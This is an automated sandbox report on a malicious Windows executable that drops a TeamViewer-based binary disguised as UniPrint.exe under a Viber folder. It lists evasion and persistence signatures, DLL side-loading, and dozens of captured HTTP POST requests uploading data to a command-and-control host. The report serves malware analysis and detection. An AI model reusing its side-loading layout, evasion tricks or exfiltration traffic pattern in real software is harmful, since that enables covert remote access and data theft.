Loading ...

Play interactive tourEdit tour

Windows Analysis Report wogZe27GBB

Overview

General Information

Sample Name:wogZe27GBB (renamed file extension from none to exe)
Analysis ID:483790
MD5:5efc68abd7fec415e34980d95a06a66a
SHA1:34b243a0b3e322b8983b528caa5849395360a91d
SHA256:0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
Tags:exeMappingOOOsigned
Infos:

Most interesting Screenshot:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:17
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
DLL side loading technique detected
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
EXE planting / hijacking vulnerabilities found
AV process strings found (often used to terminate AV products)
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • wogZe27GBB.exe (PID: 6416 cmdline: 'C:\Users\user\Desktop\wogZe27GBB.exe' MD5: 5EFC68ABD7FEC415E34980D95A06A66A)
    • UniPrint.exe (PID: 6532 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6644 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6736 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6992 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7052 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7064 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7104 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4884 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4600 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 3888 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 3864 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 3348 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6028 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6252 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 4912 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 6524 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 4420 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: wogZe27GBB.exeReversingLabs: Detection: 71%
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllReversingLabs: Detection: 51%
Source: 0.2.wogZe27GBB.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0049B32E __EH_prolog3,CryptGenRandom,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_006F605B CryptReleaseContext,
Source: C:\Users\user\Desktop\wogZe27GBB.exeEXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: msimg32.dll

Compliance:

barindex
Uses 32bit PE filesShow sources
Source: wogZe27GBB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\Desktop\wogZe27GBB.exeEXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeJump to behavior
DLL planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: msimg32.dll
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.3:49752 version: TLS 1.2
PE / OLE file has a valid certificateShow sources
Source: wogZe27GBB.exeStatic PE information: certificate valid
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000002.516408588.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.351085287.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355552090.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.373259727.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000002.381228039.000000007098C000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76431Content-Type: multipart/form-data; boundary=--------3259937207User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76426Content-Type: multipart/form-data; boundary=--------974736809User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81223Content-Type: multipart/form-data; boundary=--------1733772180User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81262Content-Type: multipart/form-data; boundary=--------3571177622User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81298Content-Type: multipart/form-data; boundary=--------3135628383User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83326Content-Type: multipart/form-data; boundary=--------2112300367User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83305Content-Type: multipart/form-data; boundary=--------1747900146User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83526Content-Type: multipart/form-data; boundary=--------4043093276User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81257Content-Type: multipart/form-data; boundary=--------4228739266User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81331Content-Type: multipart/form-data; boundary=--------3803026718User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81307Content-Type: multipart/form-data; boundary=--------2963325791User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85135Content-Type: multipart/form-data; boundary=--------2571491142User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 82926Content-Type: multipart/form-data; boundary=--------3335732562User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83052Content-Type: multipart/form-data; boundary=--------1291895716User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76682Content-Type: multipart/form-data; boundary=--------1315708494User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76660Content-Type: multipart/form-data; boundary=--------3047557173User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76627Content-Type: multipart/form-data; boundary=--------3142017803User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76637Content-Type: multipart/form-data; boundary=--------2197444700User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76633Content-Type: multipart/form-data; boundary=--------327613734User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76617Content-Type: multipart/form-data; boundary=--------3156620313User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76640Content-Type: multipart/form-data; boundary=--------2353964795User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76644Content-Type: multipart/form-data; boundary=--------2524520363User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76647Content-Type: multipart/form-data; boundary=--------776738021User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76598Content-Type: multipart/form-data; boundary=--------1255899435User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76639Content-Type: multipart/form-data; boundary=--------3577760510User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76833Content-Type: multipart/form-data; boundary=--------4017631281User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76635Content-Type: multipart/form-data; boundary=--------3576073818User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76584Content-Type: multipart/form-data; boundary=--------2060090614User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76670Content-Type: multipart/form-data; boundary=--------1263745405User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76644Content-Type: multipart/form-data; boundary=--------3327901999User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76640Content-Type: multipart/form-data; boundary=--------1002864139User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76582Content-Type: multipart/form-data; boundary=--------795614568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76736Content-Type: multipart/form-data; boundary=--------572333967User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76592Content-Type: multipart/form-data; boundary=--------3756762824User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76612Content-Type: multipart/form-data; boundary=--------4010773262User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76597Content-Type: multipart/form-data; boundary=--------1730318477User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76649Content-Type: multipart/form-data; boundary=--------2667398164User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76622Content-Type: multipart/form-data; boundary=--------2156489369User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76630Content-Type: multipart/form-data; boundary=--------271647860User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76597Content-Type: multipart/form-data; boundary=--------2981659231User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76646Content-Type: multipart/form-data; boundary=--------3817058548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76655Content-Type: multipart/form-data; boundary=--------1585944860User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76672Content-Type: multipart/form-data; boundary=--------1049848244User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76598Content-Type: multipart/form-data; boundary=--------3157952906User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
